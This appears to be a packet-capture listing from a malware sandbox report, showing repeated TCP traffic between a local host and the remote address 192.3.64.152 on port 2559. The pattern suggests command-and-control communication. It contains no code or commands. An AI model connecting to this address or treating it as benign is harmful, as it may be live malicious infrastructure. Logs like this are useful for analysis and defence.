                                                                                                                                              Dec 5, 2024 18:26:54.397941113 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398279905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398492098 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398756027 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398838997 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.398875952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.442014933 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.482698917 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.482958078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.482978106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484247923 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484447956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484575987 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484702110 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.484797001 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.526655912 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.563589096 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.583841085 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.585561037 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.597840071 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.704391956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704480886 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704526901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704667091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704750061 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.704826117 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.705420971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.707067013 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.707248926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.708580017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.709085941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.709131002 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.720215082 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.754417896 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.822761059 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.874203920 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.878926992 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.880606890 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.910271883 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:54.999610901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999624968 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999629974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999638081 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999641895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999645948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:54.999650002 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.000878096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.000967979 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.001133919 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.001301050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.001318932 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.015548944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.030313969 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.051189899 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.081037998 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.082989931 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.171873093 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.191783905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.194658041 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.205833912 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.205970049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.206250906 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207484961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207643032 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207813025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.207988977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.241722107 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.243304968 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.244462967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.314487934 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.332561970 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.362224102 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.362577915 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.364990950 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.393825054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.452594995 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.468033075 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.503768921 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.554408073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.574325085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.578068018 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.590944052 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.750092983 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:55.894716978 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:55.941708088 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:56.003806114 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.559767008 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.559917927 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560107946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560256004 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560344934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.560420036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.594113111 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.594248056 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.608318090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.642743111 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.645030975 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.672718048 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.672785044 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.672954082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.673103094 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.673249960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674077034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674307108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674426079 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674453974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.674580097 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.675523043 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.714000940 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.714067936 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.723299980 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.725157022 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.748812914 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.763644934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.763725996 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.764839888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.765208006 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.766418934 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767359972 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767380953 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767487049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.767555952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.786345005 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.788427114 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.833878994 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.833952904 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.845021009 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.846117973 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.866117001 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.906414032 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.906472921 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.906663895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.906742096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.906891108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.906928062 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.907095909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.908060074 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.908193111 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.908394098 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.908432007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.908551931 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.908610106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.909959078 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.953752995 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:57.953823090 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:57.969150066 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.007006884 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.008685112 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.028161049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.028227091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.028367996 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.028403997 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.028661966 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.028805971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.028877020 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.029995918 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.030106068 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.030535936 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.030580997 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.030651093 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.073628902 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.073677063 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.098509073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.128279924 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.128308058 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.129889011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.129981995 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.131562948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.131767035 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.133197069 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.133339882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.133378983 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.134345055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.134912014 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.176616907 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.193423033 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.193483114 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.204561949 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.204621077 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.290445089 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.303620100 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.305273056 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.315124989 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.315213919 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.362834930 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.364783049 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.414803982 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.416507006 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.424010038 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.424024105 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.425046921 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.425259113 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.425928116 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.436650038 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.436772108 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.437628031 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.483007908 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.483127117 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.483501911 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.484925985 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.486397028 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.503813028 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.527308941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.535166979 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.535348892 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.536273956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.536479950 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.536602974 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.536657095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.536698103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.557857037 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.580432892 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.589306116 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.610198975 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.615832090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.638277054 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.686431885 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.686486006 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:58.709714890 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:58.709732056 CET255949742192.3.64.152192.168.2.4
Dec 5, 2024 18:26:58.709815979 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.709873915 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.709913015 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.709924936 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.709939003 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.710048914 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.710061073 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.710072041 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.710176945 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.710253954 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.710267067 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.731192112 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.731228113 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.731251001 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.731261969 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.731340885 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.732264996 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.732306957 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.732453108 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.732492924 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.732593060 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.761148930 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.852520943 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:58.894366026 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:58.905752897 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.003743887 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.072006941 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.074419975 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.076124907 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.088458061 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.192063093 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194310904 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194323063 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194367886 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194386005 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194395065 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194462061 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194483042 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194567919 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194576979 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194607019 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194732904 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194741964 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194752932 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.194762945 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196069002 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196108103 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196118116 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196173906 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196214914 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196393967 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196403980 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196438074 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196446896 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.196506023 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.204202890 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.206882000 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.217683077 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.219418049 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.269172907 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.271440029 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.315506935 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.317425966 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.324136972 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.325484991 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.337682962 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.337759018 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.337893009 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.337902069 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.337945938 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338124037 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338171959 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338275909 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338284969 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338720083 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338731050 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338740110 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338751078 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.338759899 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.340831995 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.340841055 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
